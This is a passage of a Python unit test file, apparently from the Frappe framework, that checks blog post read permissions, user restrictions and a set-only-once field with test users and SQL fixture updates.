names = [d.name for d in frappe.get_list("Blog Post", fields=["name", "blog_category"])]
self.assertTrue("_test-blog-post-1" in names)
self.assertFalse("_test-blog-post" in names)
def test_default_values(self):
frappe.defaults.add_default("Blog Category", "_Test Blog Category 1", "test1@example.com",
"Restriction")
doc = frappe.new_doc("Blog Post")
self.assertEquals(doc.get("blog_category"), "_Test Blog Category 1")
def add_restricted_on_blogger(self):
frappe.db.sql("""update tabDocPerm set `restricted`=1 where parent='Blog Post' and role='Blogger'
and ifnull(permlevel,0)=0""")
frappe.clear_cache(doctype="Blog Post")
def test_owner_match_doc(self):
self.add_restricted_on_blogger()
frappe.set_user("test2@example.com")
post = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertTrue(post.has_permission("read"))
post1 = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertFalse(post1.has_permission("read"))
def test_owner_match_report(self):
frappe.db.sql("""update tabDocPerm set `restricted`=1 where parent='Blog Post'
and ifnull(permlevel,0)=0""")
frappe.clear_cache(doctype="Blog Post")
frappe.set_user("test2@example.com")
names = [d.name for d in frappe.get_list("Blog Post", fields=["name", "owner"])]
self.assertTrue("_test-blog-post" in names)
self.assertFalse("_test-blog-post-1" in names)
def add_restriction_to_user2(self):
frappe.set_user("test1@example.com")
add("test2@example.com", "Blog Post", "_test-blog-post")
def test_add_restriction(self):
# restrictor can add restriction
self.add_restriction_to_user2()
def test_not_allowed_to_restrict(self):
frappe.set_user("test2@example.com")
# this user can't add restriction
self.assertRaises(frappe.PermissionError, add,
"test2@example.com", "Blog Post", "_test-blog-post")
def test_not_allowed_on_restrict(self):
self.add_restriction_to_user2()
frappe.set_user("test2@example.com")
# user can only access restricted blog post
doc = frappe.get_doc("Blog Post", "_test-blog-post")
self.assertTrue(doc.has_permission("read"))
# and not this one
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertFalse(doc.has_permission("read"))
def test_not_allowed_to_remove_self(self):
self.add_restriction_to_user2()
defname = get_properties("test2@example.com", "Blog Post", "_test-blog-post")[0].name
frappe.set_user("test2@example.com")
# user cannot remove their own restriction
self.assertRaises(frappe.PermissionError, remove,
"test2@example.com", defname, "Blog Post", "_test-blog-post")
def test_allow_in_restriction(self):
self.add_restricted_on_blogger()
frappe.set_user("test2@example.com")
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertFalse(doc.has_permission("read"))
frappe.set_user("test1@example.com")
add("test2@example.com", "Blog Post", "_test-blog-post-1")
frappe.set_user("test2@example.com")
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
self.assertTrue(doc.has_permission("read"))
def test_set_only_once(self):
blog_post = frappe.get_meta("Blog Post")
blog_post.get_field("title").set_only_once = 1
doc = frappe.get_doc("Blog Post", "_test-blog-post-1")
doc.title = "New"
self.assertRaises(frappe.CannotChangeConstantError, doc.save)
blog_post.get_field("title").set_only_once = 0
|
mit
|